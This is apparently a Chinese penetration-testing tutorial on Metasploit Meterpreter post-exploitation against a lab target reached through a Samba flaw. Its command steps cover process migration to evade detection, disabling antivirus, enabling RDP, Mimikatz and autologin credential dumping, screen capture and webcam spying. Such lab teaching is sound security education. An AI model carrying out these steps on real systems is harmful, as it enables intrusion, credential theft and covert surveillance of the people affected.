本篇主要讲利用MSF获取靶机shell后可进行的操作及利用方式
前提:已经通过Samba服务漏洞获取了Meterpreter shell,利用方式可参考//www.greatytc.com/p/839ac7af5e4c
后渗透攻击:信息搜集
进程迁移
刚获取的Meterpreter shell非常脆弱易受攻击,例如攻击者可以利用浏览器漏洞攻陷目标机器,攻击渗透后浏览器有可能被用户关闭。所以第一步就是要移动进程,将它和目标机中一个稳定的进程绑在一起,而不需要对磁盘进行任何写入操作。(渗透更难被检测)
-
使用
ps
命令获取靶机正在运行的进程
-
使用
getpid
命令查看Meterpreter Shell 的进程号
-
使用
migrate PID
命令迁移进程,进程迁移后会自动关闭原来进程,没有关闭可使用 kill pid 命令关闭进程。或者使用自动迁移进程(run post/windows/manage/migrate
)命令,系统会自动寻找合适的进程然后迁移
系统命令
获得稳定进程后,收集系统信息
-
使用
sysinfo
命令查看目标机的系统信息
-
输入
run post/windows/gather/checkvm
命令查看靶机是否允许在虚拟机上
-
检查靶机是否正在运行,使用
idletime
查看靶机最近运行的时间
-
使用
route
命令查看靶机完整的网络设置
-
background 命令可将当前会话放置后台,适合在多个Meterpreter 会话的场景下使用。使用 getuid 命令查看当前靶机已经渗透成功的用户名
-
使用
run post/windows/manage/killav
命令关闭靶机系统杀毒软件
-
使用
run post/windows/manage/enable_rdp
命令启动靶机远程桌面协议
使用
background
命令将当前Meterpreter
终端隐藏在后台-
sessions -i
重新调用终端
-
使用
run post/windows/gather/enum_logged_on_users
列举当前登录靶机用户
-
使用
run post/windows/gather/enum_applications
列举安装在靶机上的应用程序
-
很多用户习惯将计算机设置自动登录,可以使用
run windows/gather/credentials/windows_autologin
抓取自动登录的用户名和密码
- Mimikatz 抓取密码
使用load mimikatz
命令加载模块,msv
抓取
解密一下成功获取密码
- 没有抓取到,此时可利用扩展插件Espia 抓取靶机屏幕截图。使用
load espia
命令加载插件,screengrab
或者screenshot
命令抓取截图
一些其他可利用的命令
webcam_list
查看靶机是否有摄像头
webcam_snap
打开靶机摄像头拍一张照片
webcam_stream
开启直播模式,抓取视频